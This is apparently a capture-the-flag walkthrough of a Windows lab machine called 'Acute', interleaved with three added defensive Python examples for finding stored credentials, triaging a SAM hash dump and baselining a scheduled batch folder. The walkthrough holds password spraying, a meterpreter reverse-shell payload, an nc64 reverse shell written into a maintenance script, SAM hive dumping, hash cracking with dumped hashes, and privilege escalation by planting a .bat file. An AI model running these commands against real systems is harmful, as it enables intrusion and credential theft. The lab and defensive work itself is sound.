echo "10.129.232.128 acute.local atsserver.acute.local" >> /etc/hosts
python3 dirsearch.py -u https://atsserver.acute.local/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
The site has a link that downloads a .docx document; the other paths found are inaccessible. Take note of the name Lois, the default password Password1!, and the name dc_manage (later used as the PowerShell session configuration name).
In the document's Description field I see Acute-PC01, which suggests there is a new PC. The creator name FCastle gives a hint about the username format. Record these names: Aileen Wallace, Charlotte Hall, Evan Davies, Ieuan Monks, Joshua Morgan, Lois Hopkins. Lois Hopkins stands out because the name Lois already appeared in the document.
The .docx file links to a remote access page: https://atsserver.acute.local/Acute_Staff_Access
This page hosts Windows PowerShell Web Access.
Try every extracted name with the default password Password1! and the computer name Acute-PC01. Candidate usernames: AWallace, WAileen, HCharlotte, CHall, EDavies, DEvan, IMonks, MIeuan, Joshua Morgan, JMorgan, MJoshua, Lois Hopkins, HLois, LHopkins, FCastle.
Successfully logged in with the credential EDavies:Password1!
I found two other user folders, jmorgan and Natasha. Continued enumeration by trying the default password on those two users.
Login with the default password Password1! failed for both.
netstat -ano | findstr TCP
Port 5040 is listening, which I have not seen before. Try chisel to forward it:
./chisel server -p 12345 --reverse
./chisel.exe client 10.10.14.11:12345 R:5040:127.0.0.1:5040
The port is reachable but gives no response.
Back to enumeration in PowerShell Web Access. The user jmorgan is a member of the Administrators group. Improve our shell control by uploading a msfvenom payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.11 LPORT=6666 -f exe -o reverse.exe
It is blocked by Windows Defender. After enumeration I found a path from which programs execute without being caught by Defender, and got the reverse shell.
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
172.16.22.1 seems to be the host machine. An RDP session was found.
Try capturing screenshots several times with the screenshare command. The captured screenshots change between runs, and from them I retrieved a credential:
acute\imonks:w3_4R3_th3_f0rce.
Upload RunasCs.exe and try it:
./RunasCs.exe acute\imonks w3_4R3_th3_f0rce. "./reverse.exe"
This did not work. Instead, build a PSCredential and use it with Invoke-Command:
$pass = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("ACUTE\imonks", $pass)
Invoke-Command -ScriptBlock { whoami } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { type C:\Users\imonks\Desktop\user.txt } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
This reads the user flag.
Invoke-Command -ScriptBlock { Get-Command } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { ls 'C:\program files' } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { ls 'C:\program files\keepmeon' } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
No permission to access this folder.
Invoke-Command -ScriptBlock { type C:\Users\imonks\Desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds
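The script above is the classic "credential baked into a maintenance script" pattern: a ConvertFrom-SecureString blob plus a PSCredential for a more privileged account, in a file that a less privileged user can read and edit. The following is an added example, not part of the original write-up, that scans PowerShell script text for that pattern (and for the -AsPlainText variant used interactively earlier) so such scripts can be found before someone else does. The two sample scripts are constructed; the hex blob and the password in them are placeholders, not the real values from the box.

```python
import re

# Constructed sample modelled on the stored-credential script shown above.
# The hex blob is a shortened placeholder, not real ConvertFrom-SecureString output.
SAMPLE_WM_PS1 = r"""$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb01000000DEADBEEF'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds
"""

# Constructed sample of the plaintext variant (-AsPlainText -Force); placeholder password.
SAMPLE_PLAINTEXT = r"""$pass = ConvertTo-SecureString "Summer2024!" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("ACUTE\svc_example", $pass)
"""

# A long hex literal assigned to a variable: the shape of a DPAPI-protected secure string.
HEX_LITERAL = re.compile(r"\$(\w+)\s*=\s*['\"]([0-9a-fA-F]{32,})['\"]")
# That variable being piped back into ConvertTo-SecureString.
PIPED_SECURE = re.compile(r"\$(\w+)\s*\|\s*ConvertTo-SecureString\b", re.I)
# A password literal converted directly (the weakest form).
PLAINTEXT = re.compile(r"ConvertTo-SecureString\s+['\"]([^'\"]*)['\"].*-AsPlainText", re.I)
# The account the credential object is built for.
PSCRED = re.compile(r"PSCredential\s*\(\s*['\"]([^'\"]+)['\"]", re.I)


def find_embedded_credentials(script):
    """Return findings (line number, kind, detail) for credential material in a script.

    The password itself is never copied into a finding; only the variable name,
    the line it lives on and the account name are reported.
    """
    findings = []
    blob_vars = {}  # variable name -> line where a hex blob was assigned
    for lineno, line in enumerate(script.splitlines(), 1):
        m = HEX_LITERAL.search(line)
        if m:
            blob_vars[m.group(1)] = lineno
        m = PIPED_SECURE.search(line)
        if m and m.group(1) in blob_vars:
            findings.append({
                "line": lineno,
                "kind": "stored-secure-string",
                "detail": f"${m.group(1)} assigned on line {blob_vars[m.group(1)]}",
            })
        m = PLAINTEXT.search(line)
        if m:
            findings.append({
                "line": lineno,
                "kind": "plaintext-password",
                "detail": "password literal on this line",
            })
        m = PSCRED.search(line)
        if m:
            findings.append({"line": lineno, "kind": "pscredential", "detail": m.group(1)})
    return findings


if __name__ == "__main__":
    for name, text in (("wm.ps1 (constructed)", SAMPLE_WM_PS1),
                       ("interactive (constructed)", SAMPLE_PLAINTEXT)):
        print(name)
        for f in find_embedded_credentials(text):
            print(f"  line {f['line']}: {f['kind']} - {f['detail']}")
```

A stored secure string is only DPAPI-protected for the user and machine that created it, which is exactly why the attack above never decrypts it: whoever can edit the script simply changes the command that runs under the credential. The check therefore treats the blob and the plaintext form as the same class of finding, and the fix is the same for both (move the task to a managed or group-managed service account and restrict write access to the script).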
net localgroup administrators
Invoke-Command -ScriptBlock { ((cat C:\Users\imonks\Desktop\wm.ps1 -Raw) -replace 'Get-Volume', 'C:\utils\nc64.exe -e cmd 10.10.14.5 6666') | sc -Path C:\Users\imonks\Desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { cat C:\Users\imonks\Desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { C:\users\imonks\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Receive a shell as jmorgan.
Retrieve the password: as a local administrator on Acute-PC01, jmorgan can save backups of the registry hives:
reg save HKLM\sam sam.bak
reg save HKLM\system sys.bak
Copy them to C:\Utils, then download them through meterpreter.
secretsdump.py -sam sam.bak -system sys.bak LOCAL
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:24571eab88ac0e2dcef127b8e9ad4740:::
Natasha:1001:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
┌─[root@htb-uzwpqxuk1h]─[/home/b3bop404/Desktop]
└──╼ #cat hash | awk -F ':' '{print $4}'
a29f7623fd11550def0192de9246f46b
31d6cfe0d16ae931b73c59d7e0c089c0
31d6cfe0d16ae931b73c59d7e0c089c0
24571eab88ac0e2dcef127b8e9ad4740
29ab86c5c4d2aab957763e5c1720486d
hashcat ./h /usr/share/wordlists/rockyou.txt
Two hashes cracked:
Administrator:Password@123
Guest:
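The dump above is in secretsdump's pwdump-style format (user:RID:LM:NT:::), and the awk one-liner hands every NT hash to hashcat, duplicates included. The "Guest:" result with an empty password is not a crack at all: 31d6cfe0d16ae931b73c59d7e0c089c0 is the well-known NT hash of the empty string, so it can be recognised before any cracking starts. The following added example (not from the original write-up) parses the dump lines shown above and triages them: accounts with an empty NT hash, accounts sharing a hash (password reuse), accounts that still have a real LM hash, and the set of unique hashes that actually need attention.

```python
import re
from collections import defaultdict

# Well-known hashes of the empty string: LM (also what a disabled LM hash looks
# like) and NT.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# The SAM dump printed by secretsdump above, one account per line.
DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:24571eab88ac0e2dcef127b8e9ad4740:::
Natasha:1001:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
"""

# user:rid:lm:nt::: with 32 hex digits per hash; anything else (banners, errors) is skipped.
LINE = re.compile(r"^([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::", re.I)


def parse_pwdump(text):
    """Parse pwdump-format lines into dicts with user, rid, lm and nt (lower-case hex)."""
    entries = []
    for raw in text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue
        user, rid, lm, nt = m.groups()
        entries.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return entries


def triage(entries):
    """Group accounts by NT hash and report what a reviewer should look at first."""
    by_nt = defaultdict(list)
    for e in entries:
        by_nt[e["nt"]].append(e["user"])
    return {
        # Empty NT hash: the account has no password at all (Guest and DefaultAccount here).
        "empty_password": sorted(by_nt.get(EMPTY_NT, [])),
        # Several accounts with the same non-empty NT hash share a password.
        "shared_nt": {h: sorted(u) for h, u in by_nt.items() if len(u) > 1 and h != EMPTY_NT},
        # A real LM hash means a weak, legacy-format hash is still stored for that account.
        "lm_present": sorted(e["user"] for e in entries if e["lm"] != EMPTY_LM),
        # Unique non-empty NT hashes: the only ones worth further work, deduplicated.
        "unique_nt": sorted(h for h in by_nt if h != EMPTY_NT),
    }


if __name__ == "__main__":
    result = triage(parse_pwdump(DUMP))
    for key, value in result.items():
        print(f"{key}: {value}")
```

On this dump the triage reports Guest and DefaultAccount as password-less, no shared or LM hashes, and three unique NT hashes instead of the five lines the awk pipeline produced. For a defender reviewing their own SAM or NTDS export, the same function is a quick way to spot enabled accounts with empty passwords and password reuse between local administrator accounts.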
Try the existing user awallace with this password:
$pass = ConvertTo-SecureString "Password@123" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("ACUTE\awallace", $pass)
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { whoami }
Try to list the keepmeon folder again (no permission earlier):
Invoke-Command -ScriptBlock { ls '\program files\keepmeon' } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
There is a .bat file:
Invoke-Command -ScriptBlock { type '\program files\keepmeon\keepmeon.bat' } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
REM This is run every 5 minutes. For Lois use ONLY
@echo off
for /R %%x in (*.bat) do (
 if not "%%x" == "%~0" call "%%x"
)
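The batch file walks its own folder recursively (for /R) and calls every .bat it finds except itself, every 5 minutes, under whatever account the scheduled task runs as. That makes the folder, including any subfolder, an execution point for anyone who can write to it. The following added example (not part of the original write-up) models which files that loop would execute and keeps a SHA-256 baseline of the folder so that a new or modified script is reported. The directory tree it builds is constructed in a temporary directory; the file names other than keepmeon.bat are made up.

```python
import hashlib
import os
import tempfile
from pathlib import Path


def bat_files(root):
    """All .bat files under root (subfolders included), as posix-style relative paths."""
    root = Path(root)
    found = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith(".bat"):
                found.append((Path(dirpath) / name).relative_to(root).as_posix())
    return sorted(found)


def scheduled_bat_targets(root, self_name="keepmeon.bat"):
    """What `for /R %%x in (*.bat) do call "%%x"` rooted at root would call.

    The batch file skips only itself ("%~0"), so every other .bat at any depth runs.
    """
    return [p for p in bat_files(root) if p != self_name]


def baseline(root):
    """Map each .bat path under root to the SHA-256 of its contents."""
    root = Path(root)
    return {p: hashlib.sha256((root / p).read_bytes()).hexdigest() for p in bat_files(root)}


def diff_baseline(old, new):
    """Report scripts that appeared, changed or vanished since the last snapshot."""
    return {
        "added": sorted(p for p in new if p not in old),
        "modified": sorted(p for p in new if p in old and new[p] != old[p]),
        "removed": sorted(p for p in old if p not in new),
    }


def demo():
    """Build a constructed keepmeon-style folder, snapshot it, then simulate a
    dropped script in a subfolder and an edit to an existing one."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "keepmeon.bat").write_text(
            '@echo off\nfor /R %%x in (*.bat) do (\n if not "%%x" == "%~0" call "%%x"\n)\n')
        (root / "cleanup.bat").write_text("@echo off\necho constructed maintenance script\n")
        before = baseline(root)

        # Any writer can add a .bat anywhere below the folder; for /R will find it.
        (root / "sub").mkdir()
        (root / "sub" / "dropped.bat").write_text("@echo off\necho constructed drop-in\n")
        # Editing an existing script is the other way to change what the task runs.
        (root / "cleanup.bat").write_text("@echo off\necho edited\n")
        after = baseline(root)

        report = diff_baseline(before, after)
        report["targets"] = scheduled_bat_targets(root)
        return report


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running the baseline from the scheduled task itself (before the loop) and refusing to call anything not in the snapshot would close the hole; a simpler fix is to drop the recursive wildcard and call a fixed list of scripts from a folder where only administrators have write access.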
Invoke-Command -ScriptBlock { net group /domain } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { net group Site_Admin /domain } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { Set-Content -Path '\program files\keepmeon\0xdf.bat' -Value 'net group site_admin awallace /add /domain'} -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { cat '\program files\keepmeon\0xdf.bat' } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { net group Site_Admin /domain } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { cat C:\users\administrator\desktop\root.txt } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
This reads root.txt.